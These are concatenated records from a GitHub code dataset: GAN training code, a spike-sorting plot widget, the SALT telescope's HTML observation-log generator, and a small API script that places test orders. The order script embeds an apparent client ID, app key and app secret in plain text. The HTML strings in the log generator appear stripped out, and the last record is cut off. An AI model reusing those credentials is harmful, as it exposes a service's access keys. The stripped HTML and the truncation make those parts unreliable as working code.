Train the generator after training the discriminator.\n\n gen_iters = 0\n flag = False\n print('Training has started')\n while not flag:\n for i, itr in enumerate(d_loader):\n\n # Training the discriminator\n # We don't want to evaluate the gradients for the Generator during Discriminator training\n self.Dis_net.zero_grad()\n\n # Training with reals. These are obviously true in the discriminator's POV\n X, _ = itr\n if inpt.size() != X.size():\n inpt.resize_(X.size(0), X.size(1), X.size(2), X.size(3))\n inpt.copy_(X)\n label.fill_(1)\n\n inptV = V(inpt)\n labelV = V(label)\n\n otpt = self.Dis_net(inptV)\n err_D_r = self.loss(otpt, labelV)\n err_D_r.backward()\n\n # Training with fakes. These are false in the discriminator's POV\n\n # We want same amount of fake data as real data\n if noise.size(0) != inpt.size(0):\n noise.resize_(inpt.size(0), noise.size(1), noise.size(2), noise.size(3))\n noise.normal_(0, 1)\n label.fill_(0)\n\n noiseV = V(noise)\n labelV = V(label)\n\n X_f = self.Gen_net(noiseV.detach())\n otpt = self.Dis_net(X_f)\n err_D_f = self.loss(otpt, labelV)\n err_D_f.backward()\n err_D = err_D_r + err_D_f\n D_optmzr.step()\n\n # Training the generator\n # We don't want to evaluate the gradients for the Discriminator during Generator training\n\n self.Gen_net.zero_grad()\n\n # The fake are reals in the Generator's POV\n label.fill_(1)\n\n labelV = V(label)\n\n X_gen = self.Gen_net(noiseV)\n otpt = self.Dis_net(X_gen)\n err_G = self.loss(otpt, labelV)\n err_G.backward()\n G_optmzr.step()\n\n gen_iters = gen_iters + 1\n\n # Showing the Progress every show_period iterations\n if gen_iters % show_period == 0:\n print('[{0}/{1}]\\tDiscriminator Error:\\t{2}\\tGenerator Error:\\t{3}'\n .format(gen_iters, n_iters, round(err_D.data[0], 5), round(err_G.data[0], 5)))\n\n # Saving the generated images every show_period*5 iterations\n if display_images:\n if gen_iters % (show_period * 5) == 0:\n gen_imgs = self.Gen_net(V(fixed_noise))\n\n # Normalizing the images to look better\n if self.n_chan > 1:\n gen_imgs.data = gen_imgs.data.mul(0.5).add(0.5)\n tv_utils.save_image(gen_imgs.data,\n 'Generated_images@iteration={0}.png'.format(gen_iters))\n\n if gen_iters == n_iters:\n flag = True\n break\n\n if 'save_model' in misc_options and flag:\n t.save(self.Gen_net.state_dict(), 'MLPGAN_Gen_net_trained_model.pth')\n t.save(self.Dis_net.state_dict(), 'MLPGAN_Dis_net_trained_model.pth')\n print('Training over and model(s) saved')\n\n elif flag:\n print('Training is over')\n\n\nclass Generator(nn.Module):\n def __init__(self, image_size, n_z, n_chan, n_hidden, depth, ngpu):\n super(Generator, self).__init__()\n\n self.image_size = image_size\n self.n_z = n_z\n self.n_hidden = n_hidden\n self.n_chan = n_chan\n self.depth = depth\n self.ngpu = ngpu\n\n layer = 1\n main = nn.Sequential()\n\n main.add_module('full_connect_{0}_{1}-{2}'.format(layer, n_z, n_hidden), nn.Linear(n_z, n_hidden))\n main.add_module('ReLU_{0}'.format(layer), nn.ReLU(True))\n\n while layer < depth - 1:\n layer = layer + 1\n main.add_module('full_connect_{0}_{1}-{2}'.format(layer, n_hidden, n_hidden),\n nn.Linear(n_hidden, n_hidden))\n main.add_module('ReLU_{0}'.format(layer), nn.ReLU(True))\n\n layer = layer + 1\n image_dim = image_size * image_size * n_chan\n main.add_module('full_connect_{0}_{1}-{2}'.format(layer, n_hidden, image_dim),\n nn.Linear(n_hidden, image_dim))\n main.add_module('Tanh_{0}'.format(layer), nn.Tanh())\n\n self.main = main\n\n def forward(self, input):\n input = input.view(-1, self.n_z)\n if self.ngpu > 0:\n 
output = nn.parallel.data_parallel(self.main, input, range(0, self.ngpu))\n else:\n output = self.main(input)\n return output.view(-1, self.n_chan, self.image_size, self.image_size)\n\n\nclass Discriminator(nn.Module):\n def __init__(self, image_size, n_chan, n_hidden, depth, ngpu):\n super(Discriminator, self).__init__()\n\n self.image_size = image_size\n self.n_chan = n_chan\n self.n_hidden = n_hidden\n self.depth = depth\n self.ngpu = ngpu\n\n layer = 1\n image_dim = image_size * image_size * n_chan\n main = nn.Sequential()\n\n main.add_module('full_connect_{0}_{1}-{2}'.format(layer, image_dim, n_hidden),\n nn.Linear(image_dim, n_hidden))\n main.add_module('ReLU_{0}'.format(layer), nn.ReLU(True))\n\n while layer < depth - 1:\n layer = layer + 1\n main.add_module('full_connect_{0}_{1}-{2}'.format(layer, n_hidden, n_hidden),\n nn.Linear(n_hidden, n_hidden))\n main.add_module('ReLU_{0}'.format(layer), nn.ReLU(True))\n\n layer = layer + 1\n main.add_module('full_connect_{0}_{1}-{2}'.format(layer, n_hidden, 1), nn.Linear(n_hidden, 1))\n main.add_module('Sigmoid_{0}'.format(layer), nn.Sigmoid())\n\n self.main = main\n\n def forward(self, input):\n input = input.view(-1, self.n_chan*self.image_size*self.image_size)\n if self.ngpu > 0:\n output = nn.parallel.data_parallel(self.main, input, range(0, self.ngpu))\n else:\n output = self.main(input)\n return output.view(-1, 1)\n","repo_name":"DL-IT/generative_zoo","sub_path":"Modules/MLPGAN.py","file_name":"MLPGAN.py","file_ext":"py","file_size_in_byte":11335,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"53"} +{"seq_id":"17889117397","text":"import numpy as np\nfrom warnings import warn\n\nfrom .base import BaseWidget, to_attr\nfrom .utils import get_unit_colors\n\n\nclass ConfusionMatrixWidget(BaseWidget):\n \"\"\"\n Plots sorting comparison confusion matrix.\n\n Parameters\n ----------\n gt_comparison: GroundTruthComparison\n The ground truth sorting comparison object\n count_text: bool\n If True counts are displayed as text\n unit_ticks: bool\n If True unit tick labels are displayed\n\n \"\"\"\n\n def __init__(self, gt_comparison, count_text=True, unit_ticks=True, backend=None, **backend_kwargs):\n plot_data = dict(\n gt_comparison=gt_comparison,\n count_text=count_text,\n unit_ticks=unit_ticks,\n )\n BaseWidget.__init__(self, plot_data, backend=backend, **backend_kwargs)\n\n def plot_matplotlib(self, data_plot, **backend_kwargs):\n import matplotlib.pyplot as plt\n from .utils_matplotlib import make_mpl_figure\n\n dp = to_attr(data_plot)\n\n self.figure, self.axes, self.ax = make_mpl_figure(**backend_kwargs)\n\n comp = dp.gt_comparison\n\n confusion_matrix = comp.get_confusion_matrix()\n N1 = confusion_matrix.shape[0] - 1\n N2 = confusion_matrix.shape[1] - 1\n\n # Using matshow here just because it sets the ticks up nicely. 
imshow is faster.\n self.ax.matshow(confusion_matrix.values, cmap=\"Greens\")\n\n if dp.count_text:\n for (i, j), z in np.ndenumerate(confusion_matrix.values):\n if z != 0:\n if z > np.max(confusion_matrix.values) / 2.0:\n self.ax.text(j, i, \"{:d}\".format(z), ha=\"center\", va=\"center\", color=\"white\")\n else:\n self.ax.text(j, i, \"{:d}\".format(z), ha=\"center\", va=\"center\", color=\"black\")\n\n self.ax.axhline(int(N1 - 1) + 0.5, color=\"black\")\n self.ax.axvline(int(N2 - 1) + 0.5, color=\"black\")\n\n # Major ticks\n self.ax.set_xticks(np.arange(0, N2 + 1))\n self.ax.set_yticks(np.arange(0, N1 + 1))\n self.ax.xaxis.tick_bottom()\n\n # Labels for major ticks\n if dp.unit_ticks:\n self.ax.set_yticklabels(confusion_matrix.index, fontsize=12)\n self.ax.set_xticklabels(confusion_matrix.columns, fontsize=12)\n else:\n self.ax.set_xticklabels(np.append([\"\"] * N2, \"FN\"), fontsize=10)\n self.ax.set_yticklabels(np.append([\"\"] * N1, \"FP\"), fontsize=10)\n\n self.ax.set_xlabel(comp.name_list[1], fontsize=20)\n self.ax.set_ylabel(comp.name_list[0], fontsize=20)\n\n self.ax.set_xlim(-0.5, N2 + 0.5)\n self.ax.set_ylim(\n N1 + 0.5,\n -0.5,\n )\n","repo_name":"SpikeInterface/spikeinterface","sub_path":"src/spikeinterface/widgets/confusion_matrix.py","file_name":"confusion_matrix.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","stars":318,"dataset":"github-code","pt":"53"} +{"seq_id":"86738029517","text":"from pyraf import iraf\nimport saltio, saltprint, salttime\nimport os, glob, string\n\n# -----------------------------------------------------------\n# core routine\n\ndef salthtml(propcode,scamobslog,rssobslog, hrsobslog, htmlpath,nightlog,readme,clobber,logfile,verbose):\n\n# set up\n \n filenames = []\n proposers = []\n propids = []\n instrumes = []\n objects = []\n ras = []\n decs = []\n detmodes = []\n ccdtypes = []\n ccdsums = []\n gainsets = []\n rospeeds = []\n filters = []\n gratings = []\n gr_angles = []\n ar_angles = []\n time_obss = []\n date_obss = []\n exptimes = []\n hours = []\n filename = {}\n proposer = {}\n propid = {}\n instrume = {}\n object = {}\n ra = {}\n dec = {}\n detmode = {}\n ccdsum = {}\n ccdtype = {}\n gainset = {}\n rospeed = {}\n filter = {}\n grating = {}\n gr_angle = {}\n ar_angle = {}\n time_obs = {}\n exptime = {}\n status=0\n\n# test the logfile\n\n logfile = saltio.logname(logfile)\n\n# log the call\n\n saltprint.line(logfile,verbose)\n history = 'SALTHTML -- '\n history += 'scamobslog='+scamobslog+' '\n history += 'rssobslog='+rssobslog+' '\n history += 'htmlpath='+htmlpath+' '\n history += 'nightlog='+nightlog+' '\n history += 'readme='+readme+' '\n yn = 'n'\n if (clobber): yn = 'y'\n history += 'clobber='+yn+' '\n history += 'logfile='+logfile+' '\n yn = 'n'\n if (verbose): yn = 'y'\n history += 'verbose='+yn\n saltprint.log(logfile,history,verbose)\n\n# start time\n\n saltprint.time('\\nSALTHTML -- started at',logfile,verbose)\n saltprint.log(logfile,' ',verbose)\n\n# are the arguments defined\n\n if (status == 0): pids,status = saltio.argunpack('propcode',propcode ,logfile)\n if (status == 0): status = saltio.argdefined('scamobslog',scamobslog,logfile)\n if (status == 0): status = saltio.argdefined('rssobslog',rssobslog,logfile)\n if (status == 0): status = saltio.argdefined('htmlpath',htmlpath,logfile)\n\n\n\n# check htmlpath exists, ends with a \"/\" and convert to absolute path\n\n if (status == 0): htmlpath, status = saltio.abspath(htmlpath,logfile)\n\n# check observation log files 
exist\n\n if (status == 0 and scamobslog.upper() != 'NONE'): status = saltio.fileexists(scamobslog,logfile)\n if (status == 0 and rssobslog.upper() != 'NONE'): status = saltio.fileexists(rssobslog,logfile)\n\n# read observation logs\n\n for obslog in [scamobslog, rssobslog, hrsobslog]:\n if (status == 0 and obslog.upper() != 'NONE'): struct,status = saltio.openfits(obslog,logfile)\n if (status == 0 and obslog.upper() != 'NONE'): obstab,status = saltio.readtab(struct[1],obslog,logfile)\n if (status == 0 and obslog.upper() != 'NONE'): status = saltio.closefits(struct,logfile)\n if (status == 0 and obslog.upper() != 'NONE'):\n filenames.extend(obstab.field('filename'))\n objects.extend(obstab.field('object'))\n ras.extend(obstab.field('ra'))\n decs.extend(obstab.field('dec'))\n instrumes.extend(obstab.field('instrume'))\n proposers.extend(obstab.field('proposer'))\n propids.extend(obstab.field('propid'))\n ccdtypes.extend(obstab.field('ccdtype'))\n ccdsums.extend(obstab.field('ccdsum'))\n gainsets.extend(obstab.field('gainset'))\n rospeeds.extend(obstab.field('rospeed'))\n detmodes.extend(obstab.field('detmode'))\n filters.extend(obstab.field('filter'))\n time_obss.extend(obstab.field('time-obs'))\n date_obss.extend(obstab.field('date-obs'))\n exptimes.extend(obstab.field('exptime'))\n if (obslog == rssobslog):\n gratings.extend(obstab.field('grating'))\n gr_angles.extend(obstab.field('gr-angle'))\n ar_angles.extend(obstab.field('ar-angle'))\n else:\n for i in range(len(filenames)):\n gratings.append(' ')\n gr_angles.append(0.)\n ar_angles.append(0.)\n\n\n# Create the list of proposals\n\n if (status == 0): pids,status=saltio.cleanpropcode(pids, propids, logfile)\n\n\n# date of observations\n \n date, caldate = salttime.date_obs2yyyymmdd(date_obss[0])\n\n# sort into chronological order\n\n for i in range(len(filenames)):\n hours.append(salttime.time_obs2hr(time_obss[i]))\n if (hours[i] < 12.): hours[i] += 24\n filename[str(hours[i])] = filenames[i]\n object[str(hours[i])] = objects[i]\n ra[str(hours[i])] = ras[i]\n dec[str(hours[i])] = decs[i]\n instrume[str(hours[i])] = instrumes[i]\n proposer[str(hours[i])] = proposers[i]\n propid[str(hours[i])] = propids[i]\n ccdsum[str(hours[i])] = ccdsums[i].replace(' ','x')\n ccdtype[str(hours[i])] = ccdtypes[i]\n gainset[str(hours[i])] = gainsets[i]\n rospeed[str(hours[i])] = rospeeds[i]\n detmode[str(hours[i])] = detmodes[i]\n filter[str(hours[i])] = filters[i]\n time_obs[str(hours[i])] = time_obss[i]\n grating[str(hours[i])] = gratings[i]\n gr_angle[str(hours[i])] = gr_angles[i]\n ar_angle[str(hours[i])] = ar_angles[i]\n exptime[str(hours[i])] = exptimes[i]\n if (instrume[str(hours[i])] == 'SALTICAM'): instrume[str(hours[i])] = 'SCM'\n if ('Video Mode' in detmode[str(hours[i])]): detmode[str(hours[i])] = 'VI'\n if ('Slot Mode' in detmode[str(hours[i])]): detmode[str(hours[i])] = 'SL'\n if ('Frame Transfer' in detmode[str(hours[i])]): detmode[str(hours[i])] = 'FT'\n if ('Normal' in detmode[str(hours[i])]): detmode[str(hours[i])] = 'IM'\n if ('Bright' in gainset[str(hours[i])]): gainset[str(hours[i])] = 'BR'\n if ('Faint' in gainset[str(hours[i])]): gainset[str(hours[i])] = 'FA'\n if ('Fast' in rospeed[str(hours[i])]): rospeed[str(hours[i])] = 'FA'\n if ('Slow' in rospeed[str(hours[i])]): rospeed[str(hours[i])] = 'SL'\n if ('OBJECT' not in ccdtype[str(hours[i])].upper() and\n 'UNKNOWN' in proposer[str(hours[i])].upper()):\n proposer[str(hours[i])] = ''\n hours.sort()\n\n# create HTML directory in datapath and define html files\n\n docpath = htmlpath + 
'doc/'\n if (status == 0 and not os.path.exists(docpath)): status = saltio.createdir(docpath,False,logfile)\n\n htmlfile = docpath + 'ObservationSequence' + date +'.html'\n notefile = docpath + 'CapeTownNotes' + date + '.html'\n nlogfile = docpath + 'AstronomersLog' + date + '.html'\n plogfile = docpath + 'PipelineLog' + date + '.html'\n elogfile = docpath + 'EnvironmentLog' + date + '.html'\n dlogfile = docpath + 'InstrumentDiagnostics' + date + '.html'\n\n# Copy css and banner images to the doc directory\n if (status == 0):\n status=saltio.copy(iraf.osfn('pipetools$html/style.css'),docpath,False,logfile)\n status=saltio.copy(iraf.osfn('pipetools$html/style_home.css'),docpath,False,logfile)\n status=saltio.copy(iraf.osfn('pipetools$html/header_salt.jpg'),docpath,False,logfile)\n\n\n# write observation log html file\n\n if (status == 0):\n status = writeobslog(htmlfile,filename,object,ra,dec,instrume,detmode,filter,ccdsum,\n gainset,rospeed,grating,gr_angle,ar_angle,exptime,time_obs,proposer,\n propid,hours,date,caldate,clobber,logfile,verbose,status)\n\n# write readme html file\n\n if (status == 0):\n status = writecapetownnotes(notefile,readme,date,caldate,clobber,logfile,verbose,status)\n\n# write nightlog html file\n\n if (status == 0):\n status = writenightlog(nlogfile,nightlog,date,caldate,clobber,logfile,verbose,status)\n\n# write pipeline log html file\n\n if (status == 0):\n status = writepipelog(plogfile,date,caldate,clobber,logfile,verbose,status)\n\n# write environment log html file\n\n if (status == 0):\n status = writeenvlog(elogfile,date,caldate,clobber,logfile,verbose,status)\n\n# write instrument diagnostics html file\n\n if (status == 0):\n status = writediaglog(dlogfile,date,caldate,clobber,logfile,verbose,status)\n\n# copy html files to PI directories\n\n if (status == 0):\n saltprint.log(logfile,' ',verbose)\n for pids in set(propids):\n for pid in pids.split(','):\n pid = pid.strip().upper()\n pidpath = htmlpath + pid\n if (os.path.exists(pidpath)):\n if (os.path.exists(pidpath+'/doc')):\n for file in glob.glob(pidpath+'/doc/*'):\n status = saltio.delete(file,False,logfile)\n status = saltio.deletedir(pidpath+'/doc',logfile)\n status = saltio.copydir(docpath,pidpath+'/doc',verbose,logfile)\n if (status == 0):\n infile, status = saltio.openascii(pidpath+'/doc/CapeTownNotes'+date+'.html','r',logfile)\n if (status == 0): saltio.delete(pidpath+'/doc/CapeTownNotes'+date+'.html',False,logfile)\n if (status == 0):\n outfile, status = saltio.openascii(pidpath+'/doc/CapeTownNotes'+date+'.html','w',logfile)\n if (status == 0):\n for line in infile:\n #line = line.replace('SALT user','Dr ' + string.capwords(pi.lower()))\n #line = line.replace('yourname',pi)\n line = line.replace('yyyymmdd',date)\n outfile.write(line)\n status = saltio.closeascii(outfile,logfile)\n\n# end time\n\n if (status == 0):\n saltprint.time('\\nSALTHTML -- completed at',logfile,verbose)\n else:\n saltprint.time('\\nSALTHTML -- aborted at',logfile,verbose)\n\n# -----------------------------------------------------------\n# write html header\n\ndef htmlheader(file,date,caldate,title,fontsize,logfile):\n\n# write html header\n\n status = 0\n\n file.write(\"\\n\")\n file.write(\"\\n\")\n file.write(\"\\n\")\n file.write(\"\\n\")\n file.write(\" \\n\")\n file.write(\" \\n\")\n file.write(\" \\n\")\n file.write(\"\" + title + date + \"\\n\")\n file.write(\"\\n\")\n file.write(\"\\n\")\n file.write(\"\\n\")\n file.write(\"\\n\")\n file.write(\" \\n\")\n file.write(\" \\n\")\n file.write(\" \\n\")\n file.write(\" 
\\n\")\n file.write(\" \\n\")\n file.write(\" \\n\")\n file.write(\" \\n\")\n file.write(\" \\n\")\n file.write(\" \\n\")\n file.write(\"
    \\n\")\n file.write(\" \\\"SALT\\n\")\n file.write(\"
    \\n\")\n file.write(\"
    \\n\")\n file.write(\"
    \\n\")\n file.write(\"
    \\n\")\n file.write(\"
    \\n\")\n file.write(\"
    \\n\")\n file.write(\"
    \\n\")\n file.write(\" \\n\")\n file.write(\"\\n\\n\")\n file.write(\"\\n\")\n file.write(\"
    \\n\")\n    file.write(\"\\n\")\n\n    return status\n\n# -----------------------------------------------------------\n# write html footer\n\ndef htmlfooter(file,logfile):\n\n    file.write(\"\\n
    \\n\")\n file.write(\"\\n
    \\n\\n\")\n file.write(\"
    \\n\")\n file.write(\"
    \\n\")\n file.write(\"
    \\n\")\n file.write(\" © SAAO 2007\\n\")\n file.write(\"
    \\n\")\n file.write(\"
    \\n\")\n file.write(\"\\n\")\n file.write(\"\\n\")\n status = saltio.closeascii(file,logfile)\n\n return status\n\n# -----------------------------------------------------------\n# write html template\n\ndef templatehtml(file,templatefile,logfile):\n\n line = ' '\n status = saltio.fileexists(templatefile,logfile)\n if (status == 0): infile, status = saltio.openascii(templatefile,'r',logfile)\n while line:\n line = infile.readline()\n file.write(line)\n\n return status\n\n# -----------------------------------------------------------\n# write observation log page\n\ndef writeobslog(htmlfile,filename,object,ra,dec,instrume,detmode,filter,\n ccdsum,gainset,rospeed,grating,gr_angle,ar_angle,exptime,\n time_obs,proposer,propid,hours,date,caldate,clobber,logfile,verbose,status):\n\n# overwrite observation log html file\n\n if (status == 0 and os.path.isfile(htmlfile) and clobber):\n status = saltio.delete(htmlfile,False,logfile)\n elif (status == 0 and os.path.isfile(htmlfile) and not clobber):\n message = 'ERROR: SALTHTML -- file ' + htmlfile + ' exists. Use clobber=y'\n status = saltprint.err(logfile,message)\n\n# open observation log html file\n\n if (status == 0):\n line = ' '\n saltprint.log(logfile,'SALTHTML -- creating ObservationSequence' + date + '.html',verbose)\n outfile, status = saltio.openascii(htmlfile,'w',logfile)\n\n# write html header\n\n if (status == 0): status = htmlheader(outfile,date,caldate,'ObservationLog',-1,logfile)\n\n# write table headings\n\n if (status == 0):\n outfile.write(\"%14s %12s %10s %9s %3s %2s %7s %3s %2s %2s %6s %5s %6s %6s %8s %15s %16s \\n\" %\n ('file'.ljust(14),\n 'object'.ljust(12),\n 'ra2000'.rjust(10),\n 'dec2000'.rjust(9),\n 'ins'.ljust(3),\n 'md'.ljust(2),\n 'filter'.rjust(7),\n 'bin'.rjust(3),\n 'gn'.rjust(2),\n 'sp'.rjust(2),\n 'grat'.rjust(6),\n 'gr-ang'.ljust(6),\n 'ar-ang'.ljust(6),\n 'exp'.rjust(6),\n 'UT'.rjust(8),\n 'Code'.ljust(15),\n 'PI'.ljust(16)))\n for i in range(140):\n outfile.write('-')\n outfile.write('\\n')\n\n# write table\n\n for i in hours:\n outfile.write(\"%15s %12s %10s %9s %3s %2s %7s %3s %2s %2s %6s %5.2f %6.2f %6.1f %8s %15s %16s\\n\" %\n (filename[str(i)].replace('.fits','')[:13].ljust(13),\n object[str(i)][:12].ljust(12),\n ra[str(i)][:10].ljust(10),\n dec[str(i)][:9].ljust(9),\n instrume[str(i)][:3].ljust(3),\n detmode[str(i)][:2].ljust(2),\n filter[str(i)][:7].rjust(7),\n ccdsum[str(i)][:3].rjust(3),\n gainset[str(i)][:2].rjust(2),\n rospeed[str(i)][:2].rjust(2),\n grating[str(i)][:6].ljust(6),\n gr_angle[str(i)],\n ar_angle[str(i)],\n exptime[str(i)],\n time_obs[str(i)][:8].ljust(8),\n propid[str(i)][:15].ljust(15),\n proposer[str(i)][:16].ljust(16)))\n\n# write html foolter\n\n if (status == 0): status = htmlfooter(outfile,logfile)\n\n return status\n\n# -----------------------------------------------------------\n# create Cape Town Note web page\n\ndef writecapetownnotes(notefile,readme,date,caldate,clobber,logfile,verbose,status):\n\n# overwrite old observation log html file if it exists\n\n line = ' '\n if (status == 0): status = saltio.overwrite(notefile,clobber,logfile)\n\n# open observation log html file\n\n if (status == 0):\n saltprint.log(logfile,'SALTHTML -- creating CapeTownNotes' + date + '.html',verbose)\n outfile, status = saltio.openascii(notefile,'w',logfile)\n\n# write html header\n\n if (status == 0): status = htmlheader(outfile,date,caldate,'CapeTownNotes',0,logfile)\n\n# readme file exists?\n\n if (status == 0):\n if (not os.path.isfile(readme)):\n status=1\n message = 'ERRROR: SALTHTML -- 
readme file does not exist'\n else:\n\n# open nightlog file\n\n if (status == 0): infile, status = saltio.openascii(readme,'r',logfile)\n\n# append night log to html file\n\n if (status == 0):\n while line:\n line = infile.readline()\n outfile.write(line)\n\n# append readme to html file\n\n if (status == 0):\n while line:\n line = infile.readline()\n outfile.write(line)\n\n# write html footer\n\n if (status == 0): status = htmlfooter(outfile,logfile)\n\n return status\n\n# -----------------------------------------------------------\n# create Night Log web page\n\ndef writenightlog(nlogfile,nightlog,date,caldate,clobber,logfile,verbose,status):\n\n# overwrite old observation log html file if it exists\n\n line = ' '\n if (status == 0): status = saltio.overwrite(nlogfile,clobber,logfile)\n\n# open observation log html file\n\n if (status == 0):\n saltprint.log(logfile,'SALTHTML -- creating AstronomersLog' + date + '.html',verbose)\n outfile, status = saltio.openascii(nlogfile,'w',logfile)\n\n# write html header\n\n if (status == 0): status = htmlheader(outfile,date,caldate,'AstronomersLog',0,logfile)\n\n# nightlog file exists?\n\n if (status == 0):\n if (not os.path.isfile(nightlog)):\n message = 'WARNING: SALTHTML -- night log does not exist'\n else:\n\n# open nightlog file\n\n if (status == 0): infile, status = saltio.openascii(nightlog,'r',logfile)\n\n# append night log to html file\n\n if (status == 0):\n while line:\n line = infile.readline()\n outfile.write(line)\n\n# write html footer\n\n if (status == 0): status = htmlfooter(outfile,logfile)\n\n# close htmlfile\n\n if (status == 0): status = saltio.closeascii(outfile,logfile)\n\n return status\n\n# -----------------------------------------------------------\n# create Pipeline Log web page\n\ndef writepipelog(plogfile,date,caldate,clobber,logfile,verbose,status):\n\n# overwrite old pipeline log html file if it exists\n\n line = ' '\n if (status == 0): status = saltio.overwrite(plogfile,clobber,logfile)\n\n# open pipeline log html file\n\n if (status == 0):\n saltprint.log(logfile,'SALTHTML -- creating PipelineLog' + date + '.html',verbose)\n outfile, status = saltio.openascii(plogfile,'w',logfile)\n\n# write html header\n\n if (status == 0): status = htmlheader(outfile,date,caldate,'PipelineLog',0,logfile)\n\n# nightlog file exists?\n\n if (status == 0):\n if (not os.path.isfile(logfile)):\n message = 'WARNING: SALTHTML -- pipeline log does not exist'\n else:\n\n# open nightlog file\n\n if (status == 0): infile, status = saltio.openascii(logfile,'r',logfile)\n\n# append night log to html file\n\n if (status == 0):\n while line:\n line = infile.readline()\n outfile.write(line)\n\n# write html footer\n\n if (status == 0): status = htmlfooter(outfile,logfile)\n\n# close htmlfile\n\n if (status == 0): status = saltio.closeascii(outfile,logfile)\n\n return status\n\n# -----------------------------------------------------------\n# create Environment Log web page\n\ndef writeenvlog(elogfile,date,caldate,clobber,logfile,verbose,status):\n\n# overwrite old environemnt log html file if it exists\n\n line = ' '\n if (status == 0): status = saltio.overwrite(elogfile,clobber,logfile)\n\n# open environment log html file\n\n if (status == 0):\n saltprint.log(logfile,'SALTHTML -- creating EnvironmentLog' + date + '.html',verbose)\n outfile, status = saltio.openascii(elogfile,'w',logfile)\n\n# write html header\n\n if (status == 0): status = htmlheader(outfile,date,caldate,'EnvironmentLog',0,logfile)\n\n# content pending\n\n outfile.write('Content 
pending\\n')\n\n# write html footer\n\n if (status == 0): status = htmlfooter(outfile,logfile)\n\n# close htmlfile\n\n if (status == 0): status = saltio.closeascii(outfile,logfile)\n\n return status\n\n# -----------------------------------------------------------\n# create Instrument Diagnostic web page\n\ndef writediaglog(dlogfile,date,caldate,clobber,logfile,verbose,status):\n\n# overwrite old diagnostic html file if it exists\n\n line = ' '\n if (status == 0): status = saltio.overwrite(dlogfile,clobber,logfile)\n\n# open diagnostic log html file\n\n if (status == 0):\n saltprint.log(logfile,'SALTHTML -- creating InstrumentDiagnostics' + date + '.html',verbose)\n outfile, status = saltio.openascii(dlogfile,'w',logfile)\n\n# write html header\n\n if (status == 0): status = htmlheader(outfile,date,caldate,'InstrumentDiagnostics',0,logfile)\n\n# content pending\n\n outfile.write('Content pending\\n')\n\n# write html footer\n\n if (status == 0): status = htmlfooter(outfile,logfile)\n\n# close htmlfile\n\n if (status == 0): status = saltio.closeascii(outfile,logfile)\n\n return status\n\n# -----------------------------------------------------------\n# main code\n\nif not iraf.deftask('salthtml'):\n parfile = iraf.osfn(\"pipetools$salthtml.par\")\n t = iraf.IrafTaskFactory(taskname=\"salthtml\",value=parfile,function=salthtml, pkgname='pipetools')\n","repo_name":"saltastro/pipetools","sub_path":"salthtml.py","file_name":"salthtml.py","file_ext":"py","file_size_in_byte":23042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8111725916","text":"# Counts how many questions already have an answer\n# Option -s shows questions with no answers\n\nimport json\nimport sys\n\n\ndef get_count(show_no_answer):\n\tf = open(\"data/progr_tehn_2023_CPKE.json\")\n\tdata = json.load(f)\n\n\tanswers = 0\n\tquestions = 0\n\n\tfor i in data:\n\t\tquestions += 1\n\t\tif i[\"correct\"] != None:\n\t\t\tanswers += 1\n\t\telif show_no_answer:\n\t\t\tprint(\"{} {}\".format(i[\"id\"], i[\"question\"]))\n\n\tprint(\"{} / {}\".format(answers, questions))\n\n\tf.close()\n\nif __name__ == '__main__':\n\tget_count('-s' in sys.argv)","repo_name":"klappscheinwerfer/CET","sub_path":"tools/get-count.py","file_name":"get-count.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26367117765","text":"import requests, time\nfrom equities_test.public_method.get_MD5 import get_md5\nfrom equities_test.public_method.get_AES import aesEncrypt\nfrom equities_test.apis.create_code import get_code\nfrom equities_test.apis.get_order_token import get_token\n\n\ndef set_order(phone, productCode, host):\n thirdOrderCode = get_code()\n orderMobile = aesEncrypt(f'{phone}')\n orderPersonName = aesEncrypt('test_order')\n accessToken = get_token(host)\n url = f\"{host}/blade-rayo-platform-rights/rayo-platform-public-api/set-rights-order\"\n payload = f\"\"\"{{\"accessToken\":\"{accessToken}\",\"productCode\":\"{productCode}\",\"quantity\":1,\"thirdOrderCode\":\"{thirdOrderCode}\",\"orderMobile\":\"{orderMobile}\",\"orderPersonName\":\"{orderPersonName}\"}}\"\"\"\n timeStamp = str(int(time.time()*1000))\n msg = \"AC2022060000000017:SmCVbpHQTX9ZrUaYg6P3fZ3g0rJSp6JbSAhawQX4:\"+payload+\":\"+timeStamp+\":Nqr40NTRXgssYPo4NFLqbIbmDzxRq3QkG8CVhnJ3vlDeEsqPrCCltKjN39nVww4z4IE7EpoPZBJw5d0clA\"\n sign = get_md5(msg)\n headers = {\n 'Authorization': 'AC2022060000000017',\n 'clientId': 
'AC2022060000000017',\n 'appKey': 'SmCVbpHQTX9ZrUaYg6P3fZ3g0rJSp6JbSAhawQX4',\n 'timeStamp': timeStamp,\n 'appSecret': 'Nqr40NTRXgssYPo4NFLqbIbmDzxRq3QkG8CVhnJ3vlDeEsqPrCCltKjN39nVww4z4IE7EpoPZBJw5d0clA',\n 'Content-Type': 'application/json',\n 'sign': sign\n }\n response = requests.request(\"POST\", url, headers=headers, data=payload)\n if response.status_code == 200:\n if response.json()['status'] == 1:\n # print(response.json())\n print(\"下单\" + response.json()['message'])\n else:\n print(\"下单\" + response.json()['message'])\n else:\n print(response.json()['msg'])\n try:\n return response.json()['data']['rightsOrderCode'] # PTU20230410172442726566500\n except:\n return response.json()\n\n\nif __name__ == '__main__':\n print(set_order(13763910426, 'P2303000000000009', \"https://5r5152q357.goho.co/right/api\"))\n # set_order(input('请输入手机号:'),input('请输入要下单的产品编号:'))","repo_name":"zhonghui-wu/equities_test","sub_path":"apis/set_order.py","file_name":"set_order.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33554539420","text":"import sys\nimport random\n\ndef word_game(x1,x2,x3):\n L= [x1,x2,x3]\n word= random.choice(L)\n L.remove(word)\n if len(x1)== len(x2) or len(x1) == len(x2) or len(x2)== len(x3):\n\n sys.stderr.write(\"Arguments should be a different length\\n\")\n sys.stderr.flush()\n\n\n else :\n\n if len(word)>len(L[0]) and len(word)>len(L[1]) :\n\n print(\" Guess a longest word: {}\".format(word))\n print(\"You found the longest word.Congratulations you won 50 pts\")\n\n elif len(L[0])>len(word) and 